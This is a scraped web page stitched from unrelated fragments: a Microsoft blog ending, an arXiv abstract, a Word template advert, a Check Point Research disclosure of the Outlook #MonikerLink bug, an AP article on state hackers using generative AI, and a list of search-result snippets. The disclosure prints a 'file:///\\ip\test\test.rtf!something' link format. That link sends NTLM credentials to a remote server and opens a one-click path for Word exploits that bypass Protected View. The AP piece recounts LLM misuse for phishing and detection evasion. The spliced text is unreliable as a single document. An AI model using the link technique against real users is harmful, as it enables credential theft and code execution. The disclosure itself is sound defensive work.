5. Modernized legislation to protect people from the abuse of technology . It is already apparent that some of these new threats will require the development of new laws and new efforts by law enforcement. We look forward to contributing ideas and supporting new initiatives by governments around the world, so we can better protect people online while honoring timeless values like the protection of free expression and personal privacy.

6. Public awareness and education. Finally, a strong defense will require a well-informed public. As we approach the second quarter of the 21 st century, most people have learned that you can’t believe everything you read on the internet (or anywhere else). A well-informed combination of curiosity and skepticism is a critical life skill for everyone.

In a similar way, we need to help people recognize that you can’t believe every video you see or audio you hear. We need to help people learn how to spot the differences between legitimate and fake content, including with watermarking. This will require new public education tools and programs, including in close collaboration with civil society and leaders across society.

Ultimately, none of this will be easy. It will require hard but indispensable efforts every day. But with a common commitment to innovation and collaboration, we believe that we can all work together to ensure that technology stays ahead in its ability to protect the public. Perhaps more than ever, this must be our collective goal.

Tags: AI , Bing , Christchurch Call , Copilot , digital safety , generative ai , Microsoft Designer , Online Safety , Responsible AI , WeProtect Global Alliance

  • Check us out on RSS

Help | Advanced Search

Computer Science > Artificial Intelligence

Title: an interactive agent foundation model.

Abstract: The development of artificial intelligence systems is transitioning from creating static, task-specific models to dynamic, agent-based systems capable of performing well in a wide range of applications. We propose an Interactive Agent Foundation Model that uses a novel multi-task agent training paradigm for training AI agents across a wide range of domains, datasets, and tasks. Our training paradigm unifies diverse pre-training strategies, including visual masked auto-encoders, language modeling, and next-action prediction, enabling a versatile and adaptable AI framework. We demonstrate the performance of our framework across three separate domains -- Robotics, Gaming AI, and Healthcare. Our model demonstrates its ability to generate meaningful and contextually relevant outputs in each area. The strength of our approach lies in its generality, leveraging a variety of data sources such as robotics sequences, gameplay data, large-scale video datasets, and textual information for effective multimodal and multi-task learning. Our approach provides a promising avenue for developing generalist, action-taking, multimodal systems.

Submission history

Access paper:.

  • Download PDF
  • Other Formats

license icon

References & Citations

  • Google Scholar
  • Semantic Scholar

BibTeX formatted citation

BibSonomy logo

Bibliographic and Citation Tools

Code, data and media associated with this article, recommenders and search tools.

  • Institution

arXivLabs: experimental projects with community collaborators

arXivLabs is a framework that allows collaborators to develop and share new arXiv features directly on our website.

Both individuals and organizations that work with arXivLabs have embraced and accepted our values of openness, community, excellence, and user data privacy. arXiv is committed to these values and only works with partners that adhere to them.

Have an idea for a project that will add value for arXiv's community? Learn more about arXivLabs .

Paper and report design and layout templates

Pen perfect looking papers and reports every time when you start your assignment with a customizable design and layout template. whether you want your paper to pop off the page or you need your report to represent your data in the best light, you'll find the right template for your next paper..

papers and reports photo

Perfect your papers and reports with customizable templates

Your papers and reports will look as professional and well put together as they sound when you compose them using customizable Word templates . Whether you're writing a research paper for your university course or putting together a high priority presentation , designer-created templates are here to help you get started. First impressions are important, even for papers, and layout can make or break someone's interest in your content. Don't risk it by freestyling, start with a tried-and-true template. Remember, though: Papers and reports don't have to be boring. Professional can still pop. Tweak your favorite layout template to match your unique aesthetic for a grade A package.

  • Android Malware 22
  • Artificial Intelligence 3
  • Check Point Research Publications 362
  • Cloud Security 1
  • Data & Threat Intelligence 1
  • Data Analysis 0
  • Global Cyber Attack Reports 292
  • How To Guides 11
  • Ransomware 1
  • Russo-Ukrainian War 1
  • Security Report 1
  • Threat and data analysis 0
  • Threat Research 168
  • Web 3.0 Security 7

microsoft research report

The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big Picture

Avatar

Introduction

Recently, Check Point Research released a white paper titled “ The Obvious, the Normal, and the Advanced: A Comprehensive Analysis of Outlook Attack Vectors ”, detailing various attack vectors on Outlook to help the industry understand the security risks the popular Outlook app may bring into organizations. As mentioned in the paper, we discovered an interesting security issue in Outlook when the app handles specific hyperlinks. In this blog post, we will share our research on the issue with the security community and help defend against it. We will also highlight the broader impact of this bug in other software.

The Hyperlink Behaviors on Outlook

As discussed in  Section I  (The Obvious: the Hyperlink Attack Vector)  in our paper , if the hyperlink is started with “http://” or “https://” – as we know it’s a web link, Outlook would happily start the (default) browser on Windows and open the web URL. It’s a very obvious behavior every Outlook user knows.

Someone may wonder what about other protocols other than http/https? Yeah, we did that test. If the link string starts with a typical application URL protocol, and Outlook thinks that URL protocol may have some security concerns, for example, the “Skype” URL protocol, as the following (in an HTML email):

When we clicked on that link, a warning dialog was promoted to warn us that the link may be unsafe to open.

microsoft research report

Now, let’s check with the common “file://” protocol. We first tested with the following, using the protocol to point to a remote Word file (replace the IP address with your own if you’d like to reproduce the tests).

When we clicked on the hyperlink, there was no warning dialog like the previous “Skype” URL protocol. However, an error message was displayed to the user in the Windows Notification Center. And the remote “test.rtf” file was indeed not accessed. The error message in the Windows Notification Center area looks like the following:

microsoft research report

That’s reasonable and good for security. Because, if Outlook allows the user to access the remote file, at least the local NTLM credential information would be leaked, as accessing the remote resource would go through the SMB protocol, which would use the local credential to authenticate.

The #MonikerLink Bug

However, if we do a slight modification about the above link, for example, modifying to the following.

Note that we added a “!” at the end of the “test.rtf” and also added some random characters “something”.

Such a link will bypass the previously discussed existing Outlook security restriction, and Outlook will continue to access the remote resource “\\10.10.111.111\test\test.rtf” when the user clicks the link.

The key point here is the special exclamation mark “!”, which changes the behavior of Outlook.

The Impact of the Bug

1. leaking the local ntlm credential information.

It’s easy to observe that the attempt to access the remote “test.rtf” would use the SMB protocol (port 445), and it would leak the local NTLM credential information during the process. It’s the same process as many other NTLM credential-leaking tricks.

microsoft research report

2. From new attack vector to arbitrary code execution

Could it even do more? That’s the deeper question we have spent much time researching to answer. Essentially, we need to figure out what really happens when the user clicks on a link like “file:///\\10.10.111.111\test\test.rtf!something”.

In fact, our in-depth analysis shows that Outlook treats the link as a “Moniker Link” (as we call it).  Monikers  is one of the key concepts of the Component Object Model (“COM”) on Windows. A “Moniker Link” string means the caller will use the string to “look up” for COM objects. Please read the related linked Microsoft docs to learn more about COM and Monikers.

Technically, Outlook calls the “ole32!MkParseDisplayName()” API to do that job – parsing the Moniker Link string and using that to “look up” for COM objects. When debugging Outlook, we could confirm that by setting a simple breakpoint on that API on Windbg. The breakpoint will be hit as long as the user clicks on the link.

According to  Microsoft ’s API document, the second parameter, “szUserName” of the API “MkParseDisplayName()” is the “display name” to be parsed. Let’s check that.

We see our Moniker Link string is there (the URL protocol prefix “file:///” is removed).

Also, as explained in the  API document , when it involves the “!”, it means this is a composite moniker: a FileMoniker based on “\\10.10.111.111\test\test.rtf”, and an ItemMoniker based on “something”.

So our test confirms that the process is that Outlook calls the API –  MkParseDisplayName(),  to look up the COM object that the Moniker Link string points to.

The Component Object Model is quite complex; it involves many concepts. But simply put, for this scenario, the caller (here is the Outlook app) just calls the COM helper APIs (here is the “MkParseDisplayName()”), to do the job. It really depends on the target application (the “COM server”) for how and what to return for the COM object. The COM server implements and exposes certain COM Interfaces to the caller or the wrapper APIs. The process is essentially like running an external application from your application (COM is much more complex, though).

Therefore, it may cause various security problems because we don’t know what the COM server would do.

For the above example – composite moniker with FileMoniker + ItemMoniker, because the extension name is “.rtf”, it calls/runs Microsoft Word to “look up” for the COM object pointed by the Moniker Link. Word is a well-designed COM-based application. The process is basically like the following.

  • Windows runs Microsoft Word as a COM server in the background (without showing the normal Word UI).
  • In the background, Word opens and parses the file “test.rtf” pointed by the file moniker – based on string “\\10.10.111.111\test\test.rtf”. After that, it attempts to look up the object pointed by the item moniker – based on the string “something”.

So this is the problem, Word opens and parses the “test.rtf” file – which is on the attacker-controlled server and controlled by the attacker. What if there’s a bug – like a code execution bug – during the process of the (running-as-a-COM-server) Word parses the test.rtf file?

We’ve successfully used an .rtf PoC and reproduced the attack, see the following, it crashes in the “WINWORD.EXE” process.

(note: the “crash” PoC we used is just a non-exploitable crash after Microsoft patched a previous RTF vulnerability, but it’s already enough to prove the point that the RTF file is parsed)

microsoft research report

We could also see that the background Word process is launched as a COM server, as the highlighted function names indicate.

Even more serious, the whole process doesn’t involve the Protected View mode – the background Word process runs at the Medium integrity level. So, this attack vector even bypasses the Protected View. It would make the attacker even easier to gain code execution on the victim’s machine.

We’d like to highlight again that Word (RTF PoC) is just an example here, it really is. Due to the nature of the Component Object Model, it really depends on the exploited application (the COM server) and how secure the application is. The “Moniker Link” issue we’re discussing here is an attack vector that “opens the door” to the future exploitation of many applications. Some applications may not even be the default-installed ones on Windows and could be installed by users from time to time. So, there’s a pretty big attack surface opened by this attack vector.

Interestingly, there’s even a  Microsoft document  saying that using  MkParseDisplayName()  or  MkParseDisplayNameEx()  to parse attacker-controlled input is unsafe.

microsoft research report

Compared to other Outlook attack vectors

Now, we understand the whole process and the problems. Some readers may wonder if this is a real concern? What about comparing it to other attack vectors on Outlook? That’s a good question.

We’ve released our  Outlook attack vector paper  so that we can answer that now. As examined and defined in our paper, the score of a single click, like this single-clicking on a hyperlink, is 1.0.

Let’s assume the attacker has an exploit for Microsoft Word working without the Protected View (as this is the most common case). If the exploit is sent as an attachment, the attacker needs the victim to perform one double-click on the attachment (Scenario 2.2.1 in the paper). However, this is not the total because an attachment sent from an external email address would activate the Protected View on Word, and that would block the attacker’s exploit because the exploit doesn’t work when the Protected View is activated. That means the attacker needs to trick the victim to perform another single-clicking to exit the Word Protected View mode, so that his/her exploit can run.

So, in total, that’s one double-click and one single click for the whole attack chain. The score for the user interoperability is: 1.2 + 1 = 2.2.

If the attacker delivers the exploit with the “Moniker Link” attack vector, it would be just a single click (clicking the link), and it also bypasses Protected View. So, the total score is just 1.0. It’s much better than the traditional score 2.2 (the lower the score, the better for attackers – worse for users).

So now, you can understand clearly it’s more convenient for the attacker (which means bad for user security) to deliver the Word exploit using the “Moniker Link” attack vector.

(Note: there are minor more requirements for the “Moniker Link” attack vector, such as the exploit needs to work with the Word COM-server mode, the victim’s network needs to allow outbound SMB traffic for external attackers)

Defense and Mitigation

We’ve confirmed this #MonikerLink bug/attack vector on the latest Windows 10/11 + Microsoft 365 (Office 2021) environments. Other Office editions/versions are likely affected, too. In fact, we believe this is an overlooked issue which existed in the Windows/COM ecosystem for decades, since it lies in the core of the COM APIs.

We’ve reported this issue to the Microsoft Security Response Center (MSRC) and they have released a critical  Security Update  for Outlook on the February 2024 Patch Tuesday (CVE-2024-21413) with the CVSS score of 9.8. We strongly recommend all Outlook users apply the official patch as soon as possible.

Check Point has developed various protections for our customers as soon as we discovered the security vulnerability internally, Check Point customers were protected many months ahead of this disclosure time. The protections are:

  • Check Point Email Security has deployed protection for customers since October 25, 2023.
  • Check Point’s Network Research Team has developed an IPS Protection named “Microsoft Outlook Malicious Moniker Link Remote Code Execution (CVE-2024-21413)” to prevent exploitation attempts of this vulnerability. Check Point’s IPS customers were protected from this vulnerability even before it’s disclosure since Nov 15, 2023.

Check Point Research continues to monitor the activities for potential attacks exploiting this bug/attacker vector in the wild through our telemetry data.

The Big Picture

Essentially, this #MonikerLink bug (or attack vector) is a security risk introduced by using an unsafe API (the MkParseDisplayName/MkParseDisplayNameEx). Therefore, this security issue may well not only exist in Microsoft Outlook, but  it may also exist in and affect other software that uses the APIs in an insecure way . We have just happened to discover the issue in Outlook.

Therefore, we’d like to call the security and developer communities to find and fix such bugs (attack vectors) in other software, too, as there’s just too much software in the real world. It’s fairly easy to perform the test. If you’re a QA or security engineer, you may put the Hyperlink following the format “file:///\\ip\test\test.rtf!something” somewhere into the input that the target software will process and monitor the behaviors of the target software when it processes the input. If you’re a developer, please watch out for the usages of the  MkParseDisplayName/MkParseDisplayNameEx  Windows APIs (and some wrapper APIs).

It’s something like the #log4j bug affecting the Java ecosystem, but this #MonikerLink bug/attack vector affects the Windows/COM ecosystem.

In this blog post, we disclosed a significant security issue in Outlook, dubbed the #MonikerLink bug. The bug not only allows the leaking of the local NTLM information, but it may also allow remote code execution and more as an attack vector. It could also bypass the Office Protected View when it’s used as an attack vector to target other Office applications. We also compared this attack vector with other attack vectors we discussed in our previously released Outlook paper and found that the risks of this issue couldn’t be simply ignored. We strongly recommend our customers and readers take appropriate actions to protect their organizations against the potential security risks it may cause. Please refer to our “Defense and Mitigation” section for more details.

With our in-depth research, we’ve also found that this #MonikerLink bug/attack vector may well not only exist in Microsoft Outlook, but it may also exist in and affect other software. We warned about the potential impact of the #MonikerLink bug in other software and encouraged the security and developer communities to find and fix such bugs.

POPULAR POSTS

microsoft research report

  • Artificial Intelligence
  • Check Point Research Publications

microsoft research report

  • Threat Research

BLOGS AND PUBLICATIONS

microsoft research report

  • Global Cyber Attack Reports

“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign

microsoft research report

“The Next WannaCry” Vulnerability is Here

microsoft research report

‘RubyMiner’ Cryptominer Affects 30% of WW Networks

microsoft research report

SUBSCRIBE TO CYBER INTELLIGENCE REPORTS

Country —Please choose an option— China India United States Indonesia Brazil Pakistan Nigeria Bangladesh Russia Japan Mexico Philippines Vietnam Ethiopia Egypt Germany Iran Turkey Democratic Republic of the Congo Thailand France United Kingdom Italy Burma South Africa South Korea Colombia Spain Ukraine Tanzania Kenya Argentina Algeria Poland Sudan Uganda Canada Iraq Morocco Peru Uzbekistan Saudi Arabia Malaysia Venezuela Nepal Afghanistan Yemen North Korea Ghana Mozambique Taiwan Australia Ivory Coast Syria Madagascar Angola Cameroon Sri Lanka Romania Burkina Faso Niger Kazakhstan Netherlands Chile Malawi Ecuador Guatemala Mali Cambodia Senegal Zambia Zimbabwe Chad South Sudan Belgium Cuba Tunisia Guinea Greece Portugal Rwanda Czech Republic Somalia Haiti Benin Burundi Bolivia Hungary Sweden Belarus Dominican Republic Azerbaijan Honduras Austria United Arab Emirates Israel Switzerland Tajikistan Bulgaria Hong Kong (China) Serbia Papua New Guinea Paraguay Laos Jordan El Salvador Eritrea Libya Togo Sierra Leone Nicaragua Kyrgyzstan Denmark Finland Slovakia Singapore Turkmenistan Norway Lebanon Costa Rica Central African Republic Ireland Georgia New Zealand Republic of the Congo Palestine Liberia Croatia Oman Bosnia and Herzegovina Puerto Rico Kuwait Moldov Mauritania Panama Uruguay Armenia Lithuania Albania Mongolia Jamaica Namibia Lesotho Qatar Macedonia Slovenia Botswana Latvia Gambia Kosovo Guinea-Bissau Gabon Equatorial Guinea Trinidad and Tobago Estonia Mauritius Swaziland Bahrain Timor-Leste Djibouti Cyprus Fiji Reunion (France) Guyana Comoros Bhutan Montenegro Macau (China) Solomon Islands Western Sahara Luxembourg Suriname Cape Verde Malta Guadeloupe (France) Martinique (France) Brunei Bahamas Iceland Maldives Belize Barbados French Polynesia (France) Vanuatu New Caledonia (France) French Guiana (France) Mayotte (France) Samoa Sao Tom and Principe Saint Lucia Guam (USA) Curacao (Netherlands) Saint Vincent and the Grenadines Kiribati United States Virgin Islands (USA) Grenada Tonga Aruba (Netherlands) Federated States of Micronesia Jersey (UK) Seychelles Antigua and Barbuda Isle of Man (UK) Andorra Dominica Bermuda (UK) Guernsey (UK) Greenland (Denmark) Marshall Islands American Samoa (USA) Cayman Islands (UK) Saint Kitts and Nevis Northern Mariana Islands (USA) Faroe Islands (Denmark) Sint Maarten (Netherlands) Saint Martin (France) Liechtenstein Monaco San Marino Turks and Caicos Islands (UK) Gibraltar (UK) British Virgin Islands (UK) Aland Islands (Finland) Caribbean Netherlands (Netherlands) Palau Cook Islands (NZ) Anguilla (UK) Wallis and Futuna (France) Tuvalu Nauru Saint Barthelemy (France) Saint Pierre and Miquelon (France) Montserrat (UK) Saint Helena, Ascension and Tristan da Cunha (UK) Svalbard and Jan Mayen (Norway) Falkland Islands (UK) Norfolk Island (Australia) Christmas Island (Australia) Niue (NZ) Tokelau (NZ) Vatican City Cocos (Keeling) Islands (Australia) Pitcairn Islands (UK)

We value your privacy!

BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.

  • Election 2024
  • Entertainment
  • Newsletters
  • Photography
  • Press Releases
  • Israel-Hamas War
  • Russia-Ukraine War
  • Latin America
  • Middle East
  • Asia Pacific
  • AP Top 25 College Football Poll
  • Movie reviews
  • Book reviews
  • Financial Markets
  • Business Highlights
  • Financial wellness
  • Artificial Intelligence
  • Social Media

Microsoft says US rivals are beginning to use generative AI in offensive cyber operations

FILE - A logo of Microsoft is displayed during an event at the Chatham House think tank in London, Jan. 15, 2024. Microsoft said Wednesday that U.S. adversaries are beginning to use generative artificial intelligence to mount or organize offensive cyber operations. (AP Photo/Kin Cheung, File)

FILE - A logo of Microsoft is displayed during an event at the Chatham House think tank in London, Jan. 15, 2024. Microsoft said Wednesday that U.S. adversaries are beginning to use generative artificial intelligence to mount or organize offensive cyber operations. (AP Photo/Kin Cheung, File)

microsoft research report

  • Copy Link copied

BOSTON (AP) — Microsoft said Wednesday that U.S. adversaries — chiefly Iran and North Korea and to a lesser extent Russia and China — are beginning to use its generative artificial intelligence to mount or organize offensive cyber operations.

The technology giant and business partner OpenAI said they had jointly detected and disrupted the malicious cyber actors’ use of their AI technologies — shutting down their accounts.

In a blog post , Microsoft said the techniques employed were “early-stage” and neither “particularly novel or unique” but it was important to expose them publicly as U.S. adversaries leverage large-language models to expand their ability to breach networks and conduct influence operations.

Cybersecurity firms have long used machine-learning on defense, principally to detect anomalous behavior in networks. But criminals and offensive hackers use it as well, and the introduction of large-language models led by OpenAI’s ChatGPT upped that game of cat-and-mouse.

A portion of a Opera page showing the incorporation of AI technology is shown in London, Tuesday, Feb. 13, 2024. The rise of generative AI chatbots is giving people new and different ways to look up information. (AP Photo/Alastair Grant)

Microsoft has invested billions of dollars in OpenAI, and Wednesday’s announcement coincided with its release of a report noting that generative AI is expected to enhance malicious social engineering, leading to more sophisticated deepfakes and voice cloning . A threat to democracy in a year where over 50 countries will conduct elections , magnifying disinformation and already occurring,

Here are some examples Microsoft provided. In each case it said all generative AI accounts and assets of the named groups were disabled:

— The North Korean cyberespionage group known as Kimsuky has used the models to research foreign think tanks that study the country, and to generate content likely to be used in spear-phishing hacking campaigns.

— Iran’s Revolutionary Guard has used large-language models to assist in social engineering, in troubleshooting software errors, and even in studying how intruders might evade detection in a compromised network. That includes generating phishing emails “including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism.” The AI helps accelerate and boost the email production.

— The Russian GRU military intelligence unit known as Fancy Bear has used the models to research satellite and radar technologies that may relate to the war in Ukraine.

— The Chinese cyberespionage group known as Aquatic Panda — which targets a broad range of industries, higher education and governments from France to Malaysia — has interacted with the models “in ways that suggest a limited exploration of how LLMs can augment their technical operations.”

— The Chinese group Maverick Panda, which has targeted U.S. defense contractors among other sectors for more than a decade, had interactions with large-language models suggesting it was evaluating their effectiveness as a source of information “on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs.”

In a separate blog published Wednesday, OpenAI said its current GPT-4 model chatbot offers “only limited, incremental capabilities for malicious cybersecurity tasks beyond what is already achievable with publicly available, non-AI powered tools.”

Cybersecurity researchers expect that to change.

Last April, the director of the U.S. Cybersecurity and Infrastructure Security Agency, Jen Easterly, told Congress that “there are two epoch-defining threats and challenges. One is China, and the other is artificial intelligence.”

Easterly said at the time that the U.S. needs to ensure AI is built with security in mind.

Critics of the public release of ChatGPT in November 2022 — and subsequent releases by competitors including Google and Meta — contend it was irresponsibly hasty, considering security was largely an afterthought in their development.

“Of course bad actors are using large-language models — that decision was made when Pandora’s Box was opened,” said Amit Yoran, CEO of the cybersecurity firm Tenable.

Some cybersecurity professionals complain about Microsoft’s creation and hawking of tools to address vulnerabilities in large-language models when it might more responsibly focus on making them more secure.

“Why not create more secure black-box LLM foundation models instead of selling defensive tools for a problem they are helping to create?” asked Gary McGraw, a computer security veteran and co-founder of the Berryville Institute of Machine Learning.

NYU professor and former AT&T Chief Security Officer Edward Amoroso said that while the use of AI and large-language models may not pose an immediately obvious threat, they “will eventually become one of the most powerful weapons in every nation-state military’s offense.”

FRANK BAJAK

IMAGES

  1. Microsoft Corporation Report

    microsoft research report

  2. FREE 11+ Sample Research Reports in MS Word

    microsoft research report

  3. FREE 11+ Sample Research Reports in MS Word

    microsoft research report

  4. 26+ Research Report Templates

    microsoft research report

  5. FREE 11+ Business Research Report Samples & Templates in MS Word

    microsoft research report

  6. FREE 11+ Sample Research Reports in MS Word

    microsoft research report

COMMENTS

  1. Microsoft New Future of Work Report 2022

    Microsoft New Future of Work Report 2022 Jaime Teevan , Nancy Baym , Jenna Butler , Brent Hecht , Sonia Jaffe , Kate Nowak , Abigail Sellen , Longqi Yang , Marcus Ash , Kagonya Awori , Mia Bruch , Piali Choudhury , Adam Coleman , Scott Counts , Shiraz Cupala , Mary Czerwinski , Ed Doran , Elizabeth Fetterolf , Mar Gonzalez Franco , Kunal Gupta ,

  2. Microsoft Research

    February 7, 2024 Explore Microsoft Research Health Futures AI Frontiers: AI for health and the future of research with Peter Lee March 30, 2023 | Peter Lee, Ashley Llorens GPT-4's potential in shaping the future of radiology November 27, 2023 | Javier Alvarez-Valle, Matthew Lungren

  3. Publications index

    Below is an index of publications written by Microsoft researchers, often in collaboration with the academic community.

  4. Microsoft New Future of Work Report 2023

    Microsoft New Future of Work Report 2023 - Microsoft Research Microsoft New Future of Work Report 2023 Jenna Butler , Sonia Jaffe , Nancy Baym , Mary Czerwinski , Shamsi Iqbal , Kate Nowak , Sean Rintel , Abigail Sellen , Mihaela Vorvoreanu , Najeeb G. Abdulhamid , Judith Amores , Reid Andersen , Kagonya Awori , Maxamed Axmed , danah boyd ,

  5. PDF Microsoft New Future of Work Report 2022

    This Microsoft New Future of Work Report 2022 summarizes important recent research developments related to hybrid work. It highlights themes that have emerged in the findings of the past year and brings to the fore older research that has become newly relevant.

  6. Microsoft releases findings and considerations from one year of remote

    REDMOND, Wash. — March 22, 2021 — Microsoft Corp. on Monday announced findings from its first-annual Work Trend Index. Titled " The Next Great Disruption Is Hybrid Work — Are We Ready? " the report uncovers seven hybrid work trends every business leader must know as we enter a new era of work.

  7. About Microsoft Research

    We are rigorous and objective: since its founding in 1991, Microsoft Research has been committed to an academic research approach that advances our understanding of the world and how we use technology to interact with it, and with each other.

  8. MSFT: Microsoft

    General Information Microsoft Corporation ONE MICROSOFT WAY REDMOND, WA 98052 Phone: 425-882-8080 Fax: 425-706-7329 Web: http://www.microsoft.com Email: [email protected] EPS Information...

  9. The effects of remote work on collaboration among information ...

    We found that, on average, firm-wide remote work decreased the number of bridging ties by 0.09 FV ( P < 0.001, 95% CI = 0.06-0.13) and the share of time with bridging ties by 0.41 FV ( P < 0.001 ...

  10. Microsoft and LinkedIn share latest data and innovation for hybrid work

    Because in uncharted territory, we need to be able to shift and adjust as data and research offer new insights to guide our way. The Hybrid Work Paradox and the 'Great Reshuffle' A report out today on our Work Trend Index shares what we're learning from Microsoft employees in over 100 countries around the world. Employee surveys tell us ...

  11. New study validates the business value and opportunity of AI

    The study, which builds on the results from Microsoft's Work Trend Index focused on workplace productivity, examines how companies are monetizing their AI investments, from generating new revenue streams to delivering differentiated customer experiences, to modernizing internal processes. Key findings from this study show*:

  12. Staying ahead of threat actors in the age of AI

    Microsoft, in collaboration with OpenAI, is publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors Forest Blizzard, Emerald Sleet, Crimson Sandstorm, and others. The observed activity includes prompt-injections, attempted misuse of large language models (LLM), and fraud.

  13. Defending Ukraine: Early Lessons from the Cyber War

    Editor's note: Today Microsoft published a new intelligence report, Defending Ukraine: Early Lessons from the Cyber War. This report represents research conducted by Microsoft's threat intelligence and data science teams with the goal of sharpening our understanding of the threat landscape in the ongoing war in Ukraine. The report also ...

  14. Microsoft Research Forum

    Episode 1 on demand Previously aired on January 30, 2024 Generative AI is continuing to find new applications across business and the sciences, and researchers are continuing to advance the foundations of AI.

  15. MSFT

    Overview Per-Share Earnings, Actuals & Estimates Microsoft Corp. Quarterly Annual

  16. Bing research resources

    Microsoft Research. Microsoft Research Publications. This page provides a list of publications written by Microsoft researchers, often in collaboration with the academic community. ... Microsoft Reports Hub. The Reports Hub provides a single source for key reports and resources across our environmental, social, and governance efforts. The ...

  17. Microsoft Corporation (MSFT) Stock Research & Reports

    Microsoft Corporation (MSFT) Stock Research & Reports - Yahoo Finance Finance Home Watchlists My Portfolio Markets News Videos Yahoo Finance Plus Screeners U.S. markets closed S&P 500...

  18. Analyst Reports, E-Books, and White Papers

    Five Steps to Modernizing Your Data

  19. Cyber Signals: Navigating cyberthreats and ...

    Vasu Jakkal, Corporate Vice President, Security, Compliance, Identity, and Management . The world of cybersecurity is undergoing a massive transformation. Artificial intelligence (AI) is at the forefront of this change, and has the potential to empower organizations to defeat cyberattacks at machine speed, address the cyber talent shortage and drive innovation and efficiency in cyber security.

  20. PDF Textbooks Are All You Need

    Microsoft Research Abstract We introduce phi-1, a new large language model for code, with significantly smaller size than competing models: phi-1 is a Transformer-based model with 1.3B parameters, trained for 4 days on 8 A100s, using a selection of "textbook quality" data from the web (6B tokens) and synthetically

  21. PDF Textbooks Are All You Need II: phi-1.5 technical report

    Microsoft Research Abstract We continue the investigation into the power of smaller Transformer-based language models as initiated by TinyStories - a 10 million parameter model that can produce coherent English - and the follow-up work on phi-1, a 1.3 billion parameter model with Python coding performance close to the state-of-the-art.

  22. Microsoft Research

    Microsoft Research. 187,362 followers. 3w. Interdisciplinary research can drive real-world impact. Join the new Microsoft Research AI & Society Fellows program, uniting eminent scholars and ...

  23. Combating abusive AI-generated content: a comprehensive approach

    A strong safety architecture. We are committed to a comprehensive technical approach grounded in safety by design. Depending on the scenario, a strong safety architecture needs to be applied at the AI platform, model, and applications levels. It includes aspects such as ongoing red team analysis, preemptive classifiers, the blocking of abusive ...

  24. PDF S ebastien Bubeck Varun Chandrasekaran Ronen Eldan Johannes Gehrke

    Microsoft Research Abstract Arti cial intelligence (AI) researchers have been developing and re ning large language models (LLMs) ... In this paper, we report on our investigation of an early version of GPT-4, when it was still in active development by OpenAI. We contend that (this early version of) GPT-

  25. PDF Microsoft Attention Spans Research Report

    Microsoft attention spans, Spring 2015 | @msadvertisingca #msftattnspans "[What information consumes is] the attention of its recipients. Hence a wealth of information creates a poverty of attention." - Herbert Simon Nobel winner, Economics (1978) Theory: brain plasticity The goal for this research is to understand what impact technology

  26. [2402.05929] An Interactive Agent Foundation Model

    The development of artificial intelligence systems is transitioning from creating static, task-specific models to dynamic, agent-based systems capable of performing well in a wide range of applications. We propose an Interactive Agent Foundation Model that uses a novel multi-task agent training paradigm for training AI agents across a wide range of domains, datasets, and tasks. Our training ...

  27. Paper and report design and layout templates

    Your papers and reports will look as professional and well put together as they sound when you compose them using customizable Word templates.Whether you're writing a research paper for your university course or putting together a high priority presentation, designer-created templates are here to help you get started.First impressions are important, even for papers, and layout can make or ...

  28. The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big

    Introduction. Recently, Check Point Research released a white paper titled "The Obvious, the Normal, and the Advanced: A Comprehensive Analysis of Outlook Attack Vectors", detailing various attack vectors on Outlook to help the industry understand the security risks the popular Outlook app may bring into organizations. As mentioned in the paper, we discovered an interesting security issue ...

  29. Microsoft says US rivals are beginning to use generative AI in

    Here are some examples Microsoft provided. In each case it said all generative AI accounts and assets of the named groups were disabled: — The North Korean cyberespionage group known as Kimsuky has used the models to research foreign think tanks that study the country, and to generate content likely to be used in spear-phishing hacking campaigns.